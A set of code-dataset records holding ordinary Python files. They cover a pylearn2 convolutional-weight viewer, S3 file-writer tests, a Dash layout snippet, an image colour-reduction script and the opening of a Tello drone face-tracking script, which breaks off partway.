"dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.calcHist", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.normalize", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.compareHist", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.HISTCMP_CORREL", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 37, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": 
"os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 48, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 54, "usage_type": "call"}, {"api_name": "os.system", "line_number": 56, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "5651919932", "text": "#! /usr/bin/env python\n\n\"\"\"\nInteractive viewer for the convolutional weights in a pickled model.\n\nUnlike ./show_weights, this shows one unit's weights at a time. This\nallows it to display weights from higher levels (which can have 100s\nof input channels), not just the first.\n\"\"\"\n\nimport os\nimport sys\nimport warnings\nimport argparse\nimport numpy\nfrom pylearn2.models.mlp import MLP, ConvElemwise, CompositeLayer\nfrom pylearn2.models.maxout import MaxoutConvC01B\nfrom pylearn2.utils import safe_zip, serial\nfrom pylearn2.space import Conv2DSpace\n\ntry:\n from matplotlib import pyplot\nexcept ImportError as import_error:\n warnings.warn(\"Can't use this script without matplotlib.\")\n pyplot = None\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(\n description=(\"Interactive browser of convolutional weights. \"\n \"Up/down keys switch layers. \"\n \"Left/right keys switch units.\"))\n\n parser.add_argument('-i',\n '--input',\n required=True,\n help=\".pkl file of model\")\n\n result = parser.parse_args()\n\n if os.path.splitext(result.input)[1] != '.pkl':\n print(\"Expected --input to end in .pkl, got %s.\" % result.input)\n sys.exit(1)\n\n return result\n\n\ndef _get_conv_layers(layer, result=None):\n '''\n Returns a list of the convolutional layers in a model.\n\n Returns\n -------\n rval: list\n Lists the convolutional layers (ConvElemwise, MaxoutConvC01B).\n '''\n\n if result is None:\n result = []\n\n if isinstance(layer, (MLP, CompositeLayer)):\n for sub_layer in layer.layers:\n _get_conv_layers(sub_layer, result)\n elif isinstance(layer, (MaxoutConvC01B, ConvElemwise)):\n result.append(layer)\n\n return result\n\n\ndef _get_conv_weights_bc01(layer):\n '''\n Returns a conv. layer's weights in BC01 format.\n\n Parameters\n ----------\n layer: MaxoutConvC01B or ConvElemwise\n\n Returns\n -------\n rval: numpy.ndarray\n The kernel weights in BC01 axis order. 
(B: output channels, C: input\n channels)\n '''\n\n assert isinstance(layer, (MaxoutConvC01B, ConvElemwise))\n weights = layer.get_params()[0].get_value()\n\n if isinstance(layer, MaxoutConvC01B):\n c01b = Conv2DSpace(shape=weights.shape[1:3],\n num_channels=weights.shape[0],\n axes=('c', 0, 1, 'b'))\n\n bc01 = Conv2DSpace(shape=c01b.shape,\n num_channels=c01b.num_channels,\n axes=('b', 'c', 0, 1))\n\n weights = c01b.np_format_as(weights, bc01)\n elif isinstance(layer, ConvElemwise):\n weights = weights[:, :, ::-1, ::-1] # reverse 0, 1 axes\n\n return weights\n\n\ndef _num_conv_units(conv_layer):\n '''\n Returns a conv layer's number of output channels.\n '''\n\n assert isinstance(conv_layer, (MaxoutConvC01B, ConvElemwise))\n\n weights = conv_layer.get_params()[0].get_value()\n\n if isinstance(conv_layer, MaxoutConvC01B):\n return weights.shape[-1]\n elif isinstance(conv_layer, ConvElemwise):\n return weights.shape[0]\n\n\ndef main():\n \"Entry point of script.\"\n\n args = _parse_args()\n\n model = serial.load(args.input)\n if not isinstance(model, MLP):\n print(\"Expected the .pkl file to contain an MLP, got a %s.\" %\n str(model.type))\n sys.exit(1)\n\n def get_figure_and_axes(conv_layers, window_width=800):\n kernel_display_width = 20\n margin = 5\n grid_square_width = kernel_display_width + margin\n num_columns = window_width // grid_square_width\n\n max_num_channels = numpy.max([layer.get_input_space().num_channels\n for layer in conv_layers])\n # pdb.set_trace()\n num_rows = max_num_channels // num_columns\n if num_rows * num_columns < max_num_channels:\n num_rows += 1\n\n assert num_rows * num_columns >= max_num_channels\n\n window_width = 15\n\n # '* 1.8' comse from the fact that rows take up about 1.8 times as much\n # space as columns, due to the title text.\n window_height = window_width * ((num_rows * 1.8) / num_columns)\n figure, all_axes = pyplot.subplots(num_rows,\n num_columns,\n squeeze=False,\n figsize=(window_width,\n window_height))\n\n for unit_index, axes in enumerate(all_axes.flat):\n subplot_title = axes.set_title('%d' % unit_index)\n subplot_title.set_size(8)\n subplot_title.set_color((.3, .3, .3))\n\n # Hides tickmarks\n for axes_row in all_axes:\n for axes in axes_row:\n axes.get_xaxis().set_visible(False)\n axes.get_yaxis().set_visible(False)\n\n return figure, all_axes\n\n conv_layers = _get_conv_layers(model)\n figure, all_axes = get_figure_and_axes(conv_layers)\n title_text = figure.suptitle(\"title\")\n pyplot.tight_layout(h_pad=.1, w_pad=.5) # in inches\n\n layer_index = numpy.array(0)\n unit_indices = numpy.zeros(len(model.layers), dtype=int)\n\n def redraw():\n '''\n Draws the currently selected convolutional kernel.\n '''\n\n axes_list = all_axes.flatten()\n layer = conv_layers[layer_index]\n unit_index = unit_indices[layer_index, ...]\n weights = _get_conv_weights_bc01(layer)[unit_index, ...]\n\n active_axes = axes_list[:weights.shape[0]]\n\n for axes, weights in safe_zip(active_axes, weights):\n axes.set_visible(True)\n axes.imshow(weights, cmap='gray', interpolation='nearest')\n\n assert len(frozenset(active_axes)) == len(active_axes)\n\n unused_axes = axes_list[len(active_axes):]\n assert len(frozenset(unused_axes)) == len(unused_axes)\n assert len(axes_list) == len(active_axes) + len(unused_axes)\n\n for axes in unused_axes:\n axes.set_visible(False)\n\n title_text.set_text(\"Layer %s, unit %d\" %\n (layer.layer_name,\n unit_indices[layer_index]))\n\n figure.canvas.draw()\n\n def on_key_press(event):\n \"Callback for key press events\"\n\n def 
increment(index, size, step):\n \"\"\"\n Increments an index in-place.\n\n Parameters\n ----------\n index: numpy.ndarray\n scalar (0-dim array) of dtype=int. Non-negative.\n\n size: int\n One more than the maximum permissible index.\n\n step: int\n -1, 0, or 1.\n \"\"\"\n assert index >= 0\n assert step in (0, -1, 1)\n\n index[...] = (index + size + step) % size\n\n if event.key in ('up', 'down'):\n increment(layer_index,\n len(conv_layers),\n 1 if event.key == 'up' else -1)\n unit_index = unit_indices[layer_index]\n redraw()\n elif event.key in ('right', 'left'):\n unit_index = unit_indices[layer_index:layer_index + 1]\n increment(unit_index,\n _num_conv_units(conv_layers[layer_index]),\n 1 if event.key == 'right' else -1)\n redraw()\n elif event.key == 'q':\n sys.exit(0)\n\n figure.canvas.mpl_connect('key_press_event', on_key_press)\n redraw()\n pyplot.show()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "lisa-lab/pylearn2", "sub_path": "pylearn2/scripts/browse_conv_weights.py", "file_name": "browse_conv_weights.py", "file_ext": "py", "file_size_in_byte": 7605, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2743, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.warn", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "pylearn2.models.mlp.MLP", "line_number": 61, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.CompositeLayer", "line_number": 61, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 64, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 64, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 85, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 85, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 88, "usage_type": "argument"}, {"api_name": "pylearn2.space.Conv2DSpace", "line_number": 89, "usage_type": "call"}, {"api_name": "pylearn2.space.Conv2DSpace", "line_number": 93, "usage_type": "call"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 98, "usage_type": "argument"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 109, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 109, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 113, "usage_type": "argument"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 115, "usage_type": "argument"}, {"api_name": "pylearn2.utils.serial.load", "line_number": 124, "usage_type": "call"}, {"api_name": "pylearn2.utils.serial", "line_number": 124, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.MLP", "line_number": 125, "usage_type": "argument"}, {"api_name": "sys.exit", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.tight_layout", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 175, "usage_type": "call"}, {"api_name": "pylearn2.utils.safe_zip", "line_number": 189, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 248, "usage_type": "name"}]} +{"seq_id": "70090084647", "text": "import sys\nimport gzip\n\nimport pytest\nimport csv\nfrom io import StringIO, BytesIO\n\nfrom dataengineeringutils3.s3 import gzip_string_write_to_s3\nfrom dataengineeringutils3.writer import (\n BytesSplitFileWriter,\n StringSplitFileWriter,\n JsonNlSplitFileWriter,\n)\nfrom tests.helpers import time_func\n\nimport jsonlines\n\n\n@pytest.mark.parametrize(\n \"max_bytes,chunk_size,expected_num\",\n [(1024, None, 5), (100000000000, 50, 3), (100000000000, None, 1)],\n)\ndef test_json_split_file_writer(s3, max_bytes, chunk_size, expected_num):\n \"\"\"Test Writer splits files, gzips and sends to s3\"\"\"\n file_key = \"test-key\"\n bucket_name = \"test\"\n s3_basepath = f\"s3://{bucket_name}/\"\n\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n bucket = s3.Bucket(bucket_name)\n with JsonNlSplitFileWriter(s3_basepath, file_key, max_bytes, chunk_size) as writer:\n for i in range(150):\n writer.write_line(f\"{i}. This test line number {i + 1}\")\n\n assert writer.total_lines == 150\n keys_in_bucket = [f\"s3://{bucket_name}/{o.key}\" for o in bucket.objects.all()]\n files_in_bucket = len(keys_in_bucket)\n assert files_in_bucket == expected_num\n assert files_in_bucket == writer.num_files\n\n assert keys_in_bucket == [\n f\"{s3_basepath}{file_key}-{i}.jsonl.gz\" for i in range(files_in_bucket)\n ]\n\n\nMAX_BYTES = 80000\nCHUNK_SIZE = 1000\n\n\ndef write_with_writer(result_set):\n with JsonNlSplitFileWriter(\n \"s3://test/\", \"test-file\", MAX_BYTES, CHUNK_SIZE\n ) as writer:\n writer.write_lines(result_set)\n\n\ndef write_manually(result_set):\n string = \"\"\n num_files = 0\n num_lines = 0\n while True:\n for line in result_set:\n string += f\"{line}\"\n if not num_lines % CHUNK_SIZE and sys.getsizeof(string) > MAX_BYTES:\n gzip_string_write_to_s3(\n string, f\"s3://test/test-file-two-{num_files}.jsonl.gz\"\n )\n num_files += 1\n num_lines = 0\n string = \"\"\n num_lines += 1\n break\n if string:\n gzip_string_write_to_s3(string, f\"s3://test/test-file-two-{num_files}.josnl.gz\")\n\n\ndef test_speed_of_writer(result_set, s3):\n \"\"\"\n Test that generator is not much slower than a flat list\n \"\"\"\n s3.meta.client.create_bucket(\n Bucket=\"test\", CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"}\n )\n\n range_time = time_func(write_manually, result_set)\n\n qs_time = time_func(write_with_writer, result_set)\n\n assert qs_time < range_time\n\n\n@pytest.mark.parametrize(\n \"folder,filename,compress\", [(\"test-csv/\", \"test-file\", False), (\"\", \"a\", True)]\n)\ndef test_with_csv_string_split_file_writer(s3, folder, filename, compress):\n \"\"\"Test string writer with statement csv\"\"\"\n bucket_name = \"test\"\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n\n csv_data = [\n (\"i\", 
\"x1\", \"x2\"),\n (1, \"a\", \"b\"),\n (2, \"a\", \"b\"),\n (3, \"a\", \"b\"),\n (4, \"a\", \"b\"),\n (5, \"a\", \"b\"),\n (6, \"a\", \"b\"),\n (7, \"a\", \"b\"),\n ]\n\n expected_file = StringIO()\n e_csv_writer = csv.writer(expected_file)\n\n ext = \"csv.gz\" if compress else \"csv\"\n\n # Test using with statement\n with StringSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=30,\n compress_on_upload=compress,\n file_extension=ext,\n ) as f:\n csv_writer = csv.writer(f)\n for row in csv_data:\n csv_writer.writerow(row)\n e_csv_writer.writerow(row)\n\n actual_s3_objects = sorted([o.key for o in s3.Bucket(bucket_name).objects.all()])\n\n # Test files written to s3\n expected_s3_objects = [f\"{folder}{filename}-0.{ext}\", f\"{folder}{filename}-1.{ext}\"]\n assert expected_s3_objects == actual_s3_objects\n\n expected = expected_file.getvalue()\n\n # Test file contents\n actual = \"\"\n for expeceted_object in expected_s3_objects:\n file_object = BytesIO()\n s3.Object(bucket_name, expeceted_object).download_fileobj(file_object)\n if compress:\n actual += gzip.decompress(file_object.getvalue()).decode(\"utf-8\")\n else:\n actual += file_object.getvalue().decode(\"utf-8\")\n file_object.close()\n\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"folder,filename,compress\", [(\"test-csv/\", \"test-file\", False), (\"\", \"a\", True)]\n)\ndef test_csv_string_split_file_writer(s3, folder, filename, compress):\n \"\"\"Test string writer csv\"\"\"\n bucket_name = \"test\"\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n\n csv_data = [\n (\"i\", \"x1\", \"x2\"),\n (1, \"a\", \"b\"),\n (2, \"a\", \"b\"),\n (3, \"a\", \"b\"),\n (4, \"a\", \"b\"),\n (5, \"a\", \"b\"),\n (6, \"a\", \"b\"),\n (7, \"a\", \"b\"),\n ]\n\n expected_file = StringIO()\n e_csv_writer = csv.writer(expected_file)\n\n ext = \"csv.gz\" if compress else \"csv\"\n\n # Test using with statement\n f = StringSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=30,\n compress_on_upload=compress,\n file_extension=ext,\n )\n csv_writer = csv.writer(f)\n for row in csv_data:\n csv_writer.writerow(row)\n e_csv_writer.writerow(row)\n f.close()\n\n actual_s3_objects = sorted([o.key for o in s3.Bucket(bucket_name).objects.all()])\n\n # Test files written to s3\n expected_s3_objects = [f\"{folder}{filename}-0.{ext}\", f\"{folder}{filename}-1.{ext}\"]\n assert expected_s3_objects == actual_s3_objects\n\n # Test file contents\n expected = expected_file.getvalue()\n actual = \"\"\n for expeceted_object in expected_s3_objects:\n file_object = BytesIO()\n s3.Object(bucket_name, expeceted_object).download_fileobj(file_object)\n if compress:\n actual += gzip.decompress(file_object.getvalue()).decode(\"utf-8\")\n else:\n actual += file_object.getvalue().decode(\"utf-8\")\n file_object.close()\n\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"folder,filename,compress,filewriter_type\",\n [\n (\"test-jsonl/\", \"test-jsonl\", False, \"bytes\"),\n (\"\", \"a\", True, \"bytes\"),\n (\"test-jsonl/\", \"test-jsonl\", False, \"string\"),\n (\"\", \"a\", True, \"string\"),\n ],\n)\ndef test_split_file_writer_with_json(s3, folder, filename, compress, filewriter_type):\n \"\"\"Test jsonline string and bytes writer\"\"\"\n\n bucket_name = \"test\"\n ext = \"jsonl.gz\" if compress else \"jsonl\"\n\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": 
\"eu-west-1\"},\n )\n\n jsonl_data = [\n {\"i\": 1, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 2, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 3, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 4, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 5, \"x1\": \"a\", \"x2\": \"b\"},\n ]\n\n if filewriter_type == \"string\":\n f = StringSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=60,\n compress_on_upload=compress,\n file_extension=ext,\n )\n\n elif filewriter_type == \"bytes\":\n f = BytesSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=60,\n compress_on_upload=compress,\n file_extension=ext,\n )\n\n else:\n raise ValueError(\"Input filewriter_type must be either 'string' or 'bytes'\")\n\n # Write data\n j_writer = jsonlines.Writer(f)\n\n expected_file = StringIO()\n e_j_writer = jsonlines.Writer(expected_file)\n\n for row in jsonl_data:\n j_writer.write(row)\n e_j_writer.write(row)\n f.close()\n\n actual_s3_objects = sorted([o.key for o in s3.Bucket(bucket_name).objects.all()])\n\n # Test files written to s3\n expected_s3_objects = [\n f\"{folder}{filename}-0.{ext}\",\n f\"{folder}{filename}-1.{ext}\",\n f\"{folder}{filename}-2.{ext}\",\n ]\n assert expected_s3_objects == actual_s3_objects\n\n # Test file contents\n expected = expected_file.getvalue()\n actual = \"\"\n for expeceted_object in expected_s3_objects:\n file_object = BytesIO()\n s3.Object(bucket_name, expeceted_object).download_fileobj(file_object)\n if compress:\n actual += gzip.decompress(file_object.getvalue()).decode(\"utf-8\")\n else:\n actual += file_object.getvalue().decode(\"utf-8\")\n file_object.close()\n\n assert actual == expected\n", "repo_name": "moj-analytical-services/dataengineeringutils3", "sub_path": "tests/test_writer.py", "file_name": "test_writer.py", "file_ext": "py", "file_size_in_byte": 8749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataengineeringutils3.writer.JsonNlSplitFileWriter", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 19, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dataengineeringutils3.writer.JsonNlSplitFileWriter", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 67, "usage_type": "call"}, {"api_name": "dataengineeringutils3.s3.gzip_string_write_to_s3", "line_number": 68, "usage_type": "call"}, {"api_name": "dataengineeringutils3.s3.gzip_string_write_to_s3", "line_number": 77, "usage_type": "call"}, {"api_name": "tests.helpers.time_func", "line_number": 88, "usage_type": "call"}, {"api_name": "tests.helpers.time_func", "line_number": 90, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 117, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 118, "usage_type": "call"}, {"api_name": "dataengineeringutils3.writer.StringSplitFileWriter", "line_number": 123, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 130, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 146, "usage_type": "call"}, {"api_name": "gzip.decompress", "line_number": 149, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 179, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 180, "usage_type": "call"}, 
{"api_name": "dataengineeringutils3.writer.StringSplitFileWriter", "line_number": 185, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 192, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 208, "usage_type": "call"}, {"api_name": "gzip.decompress", "line_number": 211, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 157, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 157, "usage_type": "attribute"}, {"api_name": "dataengineeringutils3.writer.StringSplitFileWriter", "line_number": 248, "usage_type": "call"}, {"api_name": "dataengineeringutils3.writer.BytesSplitFileWriter", "line_number": 257, "usage_type": "call"}, {"api_name": "jsonlines.Writer", "line_number": 269, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 271, "usage_type": "call"}, {"api_name": "jsonlines.Writer", "line_number": 272, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 293, "usage_type": "call"}, {"api_name": "gzip.decompress", "line_number": 296, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 219, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 219, "usage_type": "attribute"}]} +{"seq_id": "11895291614", "text": "import dash_bootstrap_components as dbc\nfrom dash import html\n\nleft_jumbotron = dbc.Col(\n html.Div(\n [\n html.H2(\"404: Rojus nerastas\", className=\"display-3\"),\n html.Hr(className=\"my-2\"),\n html.P(f\"The pathname /gallery/jumbotron was not recognised...\"),\n dbc.Button(\"Example Button\", color=\"light\", outline=True),\n ],\n className=\"h-100 p-5 text-white bg-dark rounded-3\",\n ),\n md=6,\n)\n\nright_jumbotron = dbc.Col(\n html.Div(\n [\n html.H2(\"404: Rojus nerastas\", className=\"display-3\"),\n html.Hr(className=\"my-2\"),\n html.P(f\"The pathname /gallery/jumbotron was not recognised...\"),\n dbc.Button(\"Example Button\", color=\"secondary\", outline=True),\n ],\n className=\"h-100 p-5 bg-light border rounded-3\",\n ),\n md=6,\n)\n\ncontent = dbc.Row([left_jumbotron, right_jumbotron], className=\"align-items-md-stretch\")\n", "repo_name": "loijord/sqrtmath", "sub_path": "gallery/jumbotron.py", "file_name": "jumbotron.py", "file_ext": "py", "file_size_in_byte": 946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dash_bootstrap_components.Col", "line_number": 4, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 5, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 5, "usage_type": "name"}, {"api_name": "dash.html.H2", "line_number": 7, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 7, "usage_type": "name"}, {"api_name": "dash.html.Hr", "line_number": 8, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 8, "usage_type": "name"}, {"api_name": "dash.html.P", "line_number": 9, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 9, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 10, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 17, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 18, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 18, "usage_type": "name"}, {"api_name": "dash.html.H2", "line_number": 20, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 20, "usage_type": "name"}, {"api_name": "dash.html.Hr", "line_number": 21, "usage_type": "call"}, 
{"api_name": "dash.html", "line_number": 21, "usage_type": "name"}, {"api_name": "dash.html.P", "line_number": 22, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 22, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 23, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "39792689810", "text": "import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\n\ndef draw_histograms(image, image_file):\n histogram_red = cv2.calcHist([image], [0], None, [256], [0, 256])\n histogram_green = cv2.calcHist([image], [1], None, [256], [0, 256])\n histogram_blue = cv2.calcHist([image], [2], None, [256], [0, 256])\n\n plt.plot(histogram_red, color='red')\n plt.plot(histogram_green, color='green')\n plt.plot(histogram_blue, color='blue')\n plt.legend(('Red', 'Green', 'Blue'), loc='upper right')\n plt.show()\n\n red_heads = get_heads_color(histogram_red, 3)\n green_heads = get_heads_color(histogram_green, 3)\n blue_heads = get_heads_color(histogram_blue, 2)\n\n reduce_colors(red_heads, green_heads, blue_heads, image_file)\n\n\ndef get_heads_color(numbers, level):\n splits_part = []\n split_recursive(splits_part, numbers, level, 0, len(numbers))\n head_colors = []\n for index, item in enumerate(splits_part):\n index_start = 0\n for i in range(0, index):\n index_start += len(splits_part[i])\n avg = get_average(splits_part[index], index_start)\n head_colors.append(avg)\n return head_colors\n\n\ndef split_recursive(splits, numbers, level, index_start, index_end):\n if level == 0:\n splits.append(numbers[index_start:index_end])\n return\n else:\n split_index = get_median_index(numbers[index_start:index_end])\n split_index += index_start\n level -= 1\n split_recursive(splits, numbers, level, index_start, split_index)\n split_recursive(splits, numbers, level, split_index, index_end)\n\n\ndef get_median_index(numbers):\n differences = []\n for i in range(1, len(numbers)):\n left = np.sum(numbers[0:i])\n right = np.sum(numbers[i:len(numbers)])\n differences.append(abs(left - right))\n min_index = differences.index(min(differences))\n return min_index\n\n\ndef get_average(numbers, start_index):\n sum = 0\n sum_freq = 0\n for index, freq in enumerate(numbers):\n sum += freq*(index + start_index)\n sum_freq += freq\n return int(sum/sum_freq)\n\n\ndef reduce_colors(red_heads, green_heads, blue_heads, image_input):\n new_img = Image.open(image_input)\n new_img = new_img.convert('RGB')\n pixel = new_img.load()\n\n x_lim, y_lim = new_img.size\n\n for y in range(1, y_lim):\n for x in range(1, x_lim):\n red_oldpixel, green_oldpixel, blue_oldpixel = pixel[x, y]\n red_newpixel = find_nearest_value(red_heads, red_oldpixel)\n green_newpixel = find_nearest_value(green_heads, green_oldpixel)\n blue_newpixel = find_nearest_value(blue_heads, blue_oldpixel)\n pixel[x, y] = red_newpixel, green_newpixel, blue_newpixel\n\n new_img.save('../Median_color_reduced.jpg')\n\n\ndef find_nearest_value(palette, color):\n min_err = abs(palette[0] - color)\n best_choice = palette[0]\n for i in range(1, len(palette)):\n new_err = abs(palette[i] - color)\n if new_err < min_err:\n min_err = new_err\n best_choice = palette[i]\n return best_choice\n", "repo_name": "amoazeni75/image-processing-dithering", "sub_path": "Q3.py", "file_name": "Q3.py", "file_ext": "py", "file_size_in_byte": 3118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": 
"53", "api": [{"api_name": "cv2.calcHist", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.calcHist", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.calcHist", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}]} +{"seq_id": "10339368773", "text": "from djitellopy import tello\nimport cv2\nimport numpy as np\nimport HandTrackingModule as htm\nimport FaceDetectionModule as fdm\nimport time\n\n\nme = tello.Tello()\nme.connect()\nme.streamon()\nw, h = 320, 240\nfbRange = [6200, 6800]\npid = [0.6, 0.6, 0.4]\ndetector = htm.handDetector(detectionCon=0.7)\ntipIds = [4, 8, 12, 16, 20]\npError = 0\npTime = 0\n\nprint(\"***************************************\")\nprint(\"* Drone Face Tracking Application *\")\nprint(\"* Drone will follow you *\")\nprint(\"* by tracking your face *\")\nprint(\"* - How to Use - *\")\nprint(\"***************************************\")\nprint(\"* Use Hand Sign *\")\nprint(\"* To takeoff,landing,and screenshot *\")\nprint(\"***************************************\")\nprint(\"* For emergency *\")\nprint(\"* - Controls 